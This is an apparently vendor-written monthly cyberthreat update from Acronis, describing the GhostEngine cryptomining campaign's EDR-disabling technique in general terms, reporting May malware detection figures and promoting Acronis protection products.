Authors:
Alexander Ivanyuk — Senior Director, Technology
Irina Artioli — Cyber Protection Evangelist
Candid Wüest — VP of Product Management
The Acronis Cyberthreats Update covers current cyberthreat activity and trends, as observed by Acronis analysts and sensors. Figures presented here were gathered in May of this year and reflect threats that we detected as well as news stories from the public domain. This report represents a global outlook and is based on more than one million unique endpoints distributed around the world.
Incidents of the month
A new cryptomining campaign, identified as 'REF4578,' has been discovered utilizing the 'GhostEngine' payload to disable endpoint detection and response (EDR) security software via vulnerable drivers. This sophisticated attack begins with the execution of a file named 'Tiworker.exe,' which subsequently downloads a PowerShell script designed to disable Windows Defender and erase system logs. GhostEngine leverages vulnerable drivers from software such as Avast and IObit to terminate EDR processes, thus allowing the XMRig cryptominer to run covertly.
The attack specifically targets the weak points in EDR systems by manipulating drivers that inherently have high system privileges. By terminating these critical processes, the attackers ensure their mining activities go undetected, leading to significant unauthorized resource consumption and potential financial losses.
To mitigate such threats, it is crucial to monitor for abnormal PowerShell activities with the help of technologies like Acronis Script Emulator and to implement drivers securely — for example, using ELAM like Acronis Cyber Protect does. Ensuring that all software is updated to the latest versions can also help in protecting against such vulnerabilities.
May malware detections
In May, Acronis Cyber Protect blocked 1.1 million malware threats on endpoints — a 45% decrease from April.
The below tables show the percentage of Acronis clients that had at least one malware threat blocked at the endpoint (this number has been hovering around 12% for the last year), as well as the top three countries by normalized malware detections. The higher the percentage, the higher the risk of a workload in that country being attacked by malware.
Protection
The aforementioned threats can be detected and mitigated with solutions from Acronis.
Acronis Cyber Protect Cloud protects against both known and never-before-seen threats through a multilayered protection approach. This includes behavior-based detection, AI- and ML-trained detections and anti-ransomware heuristics, which can detect and block encryption attempts and roll back any tampered files automatically without any user interaction.
Additional advanced email security and URL filtering can help you protect against social engineering threats. And the Acronis #CyberFit score helps you quickly identify systems that need attention, while the integrated Patch Management makes updating your software to the latest versions simple.
Advanced Security + Extended Detection and Response (XDR) for Acronis Cyber Protect Cloud brings the visibility needed to understand attacks while simplifying the context for administrators and enabling efficient remediation of any threats.
Learn more about Acronis’ approach to cyber protection.